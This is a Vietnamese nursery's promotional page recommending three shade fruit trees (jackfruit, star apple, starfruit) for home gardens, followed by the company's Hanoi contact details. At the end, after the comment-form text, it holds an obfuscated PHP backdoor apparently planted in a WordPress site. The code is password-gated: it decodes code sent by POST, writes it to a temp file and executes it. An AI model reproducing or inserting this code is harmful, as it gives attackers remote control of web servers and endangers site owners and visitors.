3 loại cây ăn quả cho bóng mát được trồng nhiều nhất 2020

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Trồng cây gì lấy bóng mát – Hiện nay các loại cây ăn quả đang rất được ưa chuộng và được trồng rất nhiều. Người ta đang trồng những loại cây ăn quả và đem lại bóng mát, nhằm tạo ra một không gian tránh nắng nóng của những ngày hè hiệu quả nhất. Vẫn có thể đem lại hiệu quả là việc thu hoạch được trái cây, nói về các loại cây trồng là cây ăn quả thì có rất nhiều loại cây đa dạng khác nhau. 

Vườn Cây Hòa Bình sẽ đem đến cho bạn thông tin về 3 loại cây ăn quả cho bóng mát được trồng nhiều nhất 2020, để bạn có thể tham khảo và lựa chọn các loại cây phù hợp nhất để trồng. Đã gần đến tết Tân Sửu 2021 bạn hãy nhanh chóng chọn ra những loại cây ăn quả phù hợp để được thu hoạch cũng như có thêm cảnh quan xanh.

Cây mít

Đây là một loại cây rất phổ biến tại các vùng quê miền Bắc, đây cũng là một loại cây cho bóng mát khá phù hợp cho việc trồng trong vườn của mỗi nhà. Mít là một loại cây gỗ nhỡ thường sẽ có thể phát triển từ 8 mét đến 15 mét. Mít sẽ cho ra quả khi được khoảng 3 năm tuổi còn quả của cây là thuộc giống quả phức, giống quả ăn được. 

Cây mít là một loại cây mà cho ra quả chín to nhất so với những loại cây ăn quả khác, quả mít có giá trị kinh tế cao. Đây cũng là loại quả đem lại giá trị thương mại lớn, với mỗi quả thường sẽ có kích thước khá lớn từ 30cm-60cm x 20cm-30cm. Và vỏ của quả mít sẽ thường khá xù xì và có gai nhỏ đây là một điểm đặc trưng của giống quả này. 

cây mít lâu năm
cây mít lâu năm

Các cây mít cho ra quả vào thời điểm giữa mùa xuân rồi sau đó sẽ quả sẽ chín và được thu hoạch đến cuối mùa hè tầm tháng 7 hoặc tháng 8. Mít cũng là một loại đặc trưng thuộc trong các loại quả ngọt tại vùng nhiệt đới. Đây là một loại trái cây được xuất khẩu khá nhiều, tại những vùng ôn đới thì thường thấy mít được tiêu thụ nhiều trong các dạng đóng hộp theo dạng sirô. Đối với các nước như Mỹ hay các quốc gia của Châu Âu thì hay nhập cảng là sản phẩm mít tươi.

Bên cạnh đó mít còn được đóng lon và cả dưới dạng chế biến quả nhờ việc sấy khô, cắt lát thành những miếng mỏng sau đó là chiên giòn.

>>> Xem thêm: Bán cây công trình giá rẻ – mua bán cây công trình giá rẻ Hà Nội

Cây vú sữa 

Loại cây này thuộc vào họ nhà Hồng Xiêm tên khoa học của giống cây này là Chrysophyllum cainino. Cụ thể thì cây vú sữa được xét vào bộ Thị: Ebenales. Loại cây này có nguồn gốc bắt đầu từ đảo Antilles và từ vùng châu Mỹ nhiệt đới. Cây vú sữa là một giống cây trồng có tốc độ phát triển, tốc độ lớn rất nhanh có phần thân khá dẻo, chiều cao thông trung bình thường từ khoảng 10 mét đến 15 mét. Cây vú sữa cho tán lá khá rộng, vỏ quả vú sữa có màu xanh, các quả thường có kích thước bằng một nắm tay khi quả chín thì được chuyển sang màu hồng nhạt.

Vú sữa công trình là cây ăn quả gắn liền với nhiều sự tích và truyền mà chúng ta ai cũng đã biết đến trong chu trình trưởng thành, đây là một loại quả thơm ngon được rất nhiều người ưa thích
Cây vú sữa 

Loại quả này ăn đem đến một hương vị khá ngon, loại cây này được đưa vào trong các giống cây trồng để tạo cảnh quan, không gian xanh của những khu biệt thự ở thành phố.

Ở Việt Nam thì cây vú sữa chia ra là 2 loại chính là vú sữa với vỏ tím than và vú sữa với da xanh. Mặc dù có màu vỏ khá khác nhau tuy nhiên hương thơm và mùi vị, độ ngọt lại khá giống nhau.

>>> Xem thêm: Thông tin chi tiết về Vườn cây Hòa Bình

Cây khế

Cây khế thuộc vào một giống cây của họ Oxalidaceae, có nguồn gốc xuất phát từ Sri Lanka một quốc gia Nam Á. Loại cây này rất phổ biến ở những quốc gia Đông Nam Á, đây là một loại quả được trồng khá nhiều tại Việt Nam. Khế là một giống cây rất phù hợp ở các vùng đất của những nơi có khí hậu nhiệt đới. 

Đây là một loại cây trồng đem lại năng suất khá cao, giống cây này đem đến khoảng 9 vụ đến 10 vụ thu hoạch trong một năm. Các loại cây này luôn đem lại giá trị kinh tế khá tốt, cây khế cũng có quy mô và giá trị kinh tế ở miền Nam của Hawaii và Florida.

Cây khế

Tại Việt Nam thì được trồng nhiều tại khu vực miền Bắc, đây là một giống cây ăn quả đặc trưng của nhiều địa phương ở miền Bắc.

>>> Xem thêm: Dịch vụ mua, bán cây trồng giá rẻ tại Hà Nội

Đơn vị cung cấp uy tín 

Vườn Cây Hòa Bình là một địa chỉ chuyên cung cấp các sản phẩm cây công trình, cây xanh nội thất, cây xanh đô thị, cây xanh ngoại thất, cây phong thủy và một số loại cây khác. Chúng tôi luôn đem đến các mẫu cây đa dạng đem đến cho khách hàng có thể lựa chọn phù hợp nhất với không gian. Bên dưới là liên hệ của chúng tôi các bạn hãy liên hệ để được nhận được sự tư vấn hữu ích nhất.

Thông tin liên hệ:

CÂY CÔNG TRÌNH GIÁ RẺ TẠI HÀ NỘI

Hotline: 0962.376.560

Bán hàng: 0962.376.560

Nguyễn Trường Giang 

Địa chỉ: Tổ dân phố hoà bình 2, Biên giang , Hà Đông ,Hà Nội

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}